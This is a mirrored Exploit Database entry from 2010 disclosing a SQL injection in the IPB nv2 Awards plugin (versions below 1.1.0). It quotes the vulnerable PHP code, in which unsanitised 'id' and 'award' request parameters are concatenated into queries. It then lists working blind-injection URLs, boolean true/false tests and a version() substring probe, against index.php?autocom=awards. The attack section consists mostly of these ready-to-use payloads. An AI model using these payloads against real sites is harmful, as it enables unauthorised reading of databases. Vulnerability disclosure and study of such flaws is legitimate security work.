IPB (nv2) Awards < 1.1.0 - SQL Injection

• Exploit Database
• 112 阅读

• 作者： fred777
  日期： 2010-01-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11297/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

  ################################################# + +Author:fred777 - [fred777.de] +Link:http://forums.invisionize.com/nv2-Awards-120-t137847.html +Vuln: index.php?autocom=awards&do=view&id=1 +Greetzz to: Back2hack.cc +Contact:nebelfrost77@googlemail.com + #################################################   --[ Vuln Code ] --   $this->ipsclass->DB->build_query( array( 'select' => 'a.user_id', 'from' => array( 'awarded' => 'a' ), 'where' => 'a.award_id=' . $this->ipsclass->input['id'], 'add_join' => array( 0 => array( 'select' => 'm.members_display_name', 'from' => array( 'members' => 'm' ), 'where' => 'm.id=a.user_id', 'type' => 'left', ) ), ) );   --------------------------------------------------------------------------------------   'select' => '*', 'from' => 'awards', 'where' => 'id = "' . $_POST['award'] . '"', ) );   --------------------------------------------------------------------------------------   $award_dat['user_id'] = $_GET['id']; $award_dat['award_id'] = $_POST['award'];   ################################################   --[ Exploitable ]--   http://server/index.php?autocom=awards&do=view&id=1[SQL INJECTION]   http://server/index.php?autocom=awards&do=view&id=1+and+1=1 > true http://server/index.php?autocom=awards&do=view&id=1+and+1=0 > false   http://server/index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=5 http://server/index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=4   ################################################